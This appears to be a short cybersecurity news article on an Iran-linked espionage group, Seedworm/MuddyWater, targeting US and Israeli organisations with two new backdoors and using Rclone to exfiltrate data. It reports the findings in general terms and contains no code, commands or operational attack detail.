Iran-Linked APT Group Deploys Sophisticated Backdoors to Compromise US Critical Infrastructure

Post Views: 161

Sophisticated Cyber Espionage Campaign Uncovered

A sophisticated cyber espionage campaign, attributed to an Iranian advanced persistent threat (APT) group, has been uncovered targeting several critical sectors in the United States.

Attribution and History

The group, known as Seedworm or MuddyWater, has been linked to Iran’s Ministry of Intelligence and Security (MOIS) and has a history of conducting espionage campaigns against government agencies, telecommunications companies, and critical infrastructure.

Targets and Methods

Researchers at Symantec and Carbon Black have identified suspicious activity on the networks of a US bank, a US airport, non-profit organizations, and the Israeli operations of a US software company that supplies the defense and aerospace industries.

The activity, which began in early February 2026, has continued into recent days, with the group leveraging previously unknown malware.

The attackers have been using two new backdoors, Dindoor and Fakeset, to gain unauthorized access to targeted networks.

Dindoor is a JavaScript-based backdoor that uses the Deno runtime environment to execute commands on infected machines, while Fakeset is a Python-based backdoor.

Both backdoors were digitally signed with certificates issued to individuals with previously known associations with the Seedworm APT.

Goals and Motivations

The primary goal of the campaign appears to be espionage, with the attackers attempting to exfiltrate data from the targeted software company to a cloud storage bucket hosted by Wasabi using the open-source tool Rclone.

The researchers noted that the group’s existing presence on US and Israeli networks prior to the current hostilities in the region puts them in a potentially dangerous position to launch attacks.

Exposure of Infrastructure

An independent threat intelligence research collective, Ctrl-Alt-Intel, recently accessed infrastructure used by Seedworm/MuddyWater, which provided a broad view into the group’s operations.

The exposed infrastructure, hosted in the Netherlands, revealed a vast array of tooling, scripts, logs, and victim data, showcasing the group’s extensive capabilities.

Multiple custom-developed command and control (C2) frameworks
Exploitation of over a dozen CVEs, including novel SQL injection vulnerabilities
Password spraying campaigns
Multiple exfiltration channels

Conclusion

The discovery of this campaign highlights the ongoing threat posed by Iranian APT groups and the need for organizations to remain vigilant in their cybersecurity efforts.